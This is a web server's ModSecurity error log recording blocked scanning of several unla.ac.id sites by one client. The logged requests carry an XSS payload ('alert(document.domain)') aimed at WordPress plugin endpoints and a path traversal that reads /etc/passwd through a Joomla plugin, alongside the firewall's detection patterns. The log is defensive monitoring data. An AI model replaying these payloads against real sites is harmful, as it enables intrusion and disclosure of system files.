[Tue Aug 29 11:56:06.545687 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:submit: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php"] [unique_id "ZO16ZsCo-f0AAAq@se8AAAAM"]
[Tue Aug 29 11:56:06.586191 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:submit: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php"] [unique_id "ZO16ZsCo-f0AAAqSw6gAAAAN"]
[Tue Aug 29 11:56:06.627924 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/simpel-reserveren/edit.php"] [unique_id "ZO16ZsCo-f0AAAq@sfEAAAAM"]
[Tue Aug 29 11:56:06.734363 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:submit: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php"] [unique_id "ZO16ZsCo-f0AAApa-TAAAAAg"]
[Tue Aug 29 11:56:06.736187 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:submit: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php"] [unique_id "ZO16ZsCo-f0AAAqSw6sAAAAN"]
[Tue Aug 29 11:56:06.788856 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:submit: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php"] [unique_id "ZO16ZsCo-f0AAAq@sfUAAAAM"]
[Tue Aug 29 11:56:07.590540 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:submit: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php"] [unique_id "ZO16Z8Co-f0AAArC7fQAAAAW"]
[Tue Aug 29 11:56:07.594765 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16Z8Co-f0AAApbUvYAAAAh"]
[Tue Aug 29 11:56:07.612509 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:title_az. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:title_az: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/title_az.php"] [unique_id "ZO16Z8Co-f0AAArC7fUAAAAW"]
[Tue Aug 29 11:56:07.617289 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16Z8Co-f0AAAqY6RAAAAAr"]
[Tue Aug 29 11:56:07.623271 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:title_az. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:title_az: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/title_az.php"] [unique_id "ZO16Z8Co-f0AAApa-TMAAAAg"]
[Tue Aug 29 11:56:07.640165 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:title_az. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:title_az: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/title_az.php"] [unique_id "ZO16Z8Co-f0AAAq5@MUAAAAK"]
[Tue Aug 29 11:56:07.648568 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:title_az. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:title_az: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/title_az.php"] [unique_id "ZO16Z8Co-f0AAAq@sf0AAAAM"]
[Tue Aug 29 11:56:07.674339 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16Z8Co-f0AAArC7fgAAAAW"]
[Tue Aug 29 11:56:07.696670 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16Z8Co-f0AAAqY6RMAAAAr"]
[Tue Aug 29 11:56:07.696735 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:title_az. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:title_az: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/title_az.php"] [unique_id "ZO16Z8Co-f0AAArC7fkAAAAW"]
[Tue Aug 29 11:56:07.699111 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:title_az. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:title_az: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/title_az.php"] [unique_id "ZO16Z8Co-f0AAAq@sf8AAAAM"]
[Tue Aug 29 11:56:07.706648 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16Z8Co-f0AAAq5@McAAAAK"]
[Tue Aug 29 11:56:08.546661 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/content/jw_allvideos/includes/download.php"] [unique_id "ZO16aMCo-f0AAAq@sgEAAAAM"]
[Tue Aug 29 11:56:08.548609 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/plugins/content/jw_allvideos/includes/download.php"] [unique_id "ZO16aMCo-f0AAApa-TgAAAAg"]
[Tue Aug 29 11:56:08.551301 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/plugins/content/jw_allvideos/includes/download.php"] [unique_id "ZO16aMCo-f0AAArC7fsAAAAW"]
[Tue Aug 29 11:56:08.552059 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/plugins/content/jw_allvideos/includes/download.php"] [unique_id "ZO16aMCo-f0AAApbUvwAAAAh"]
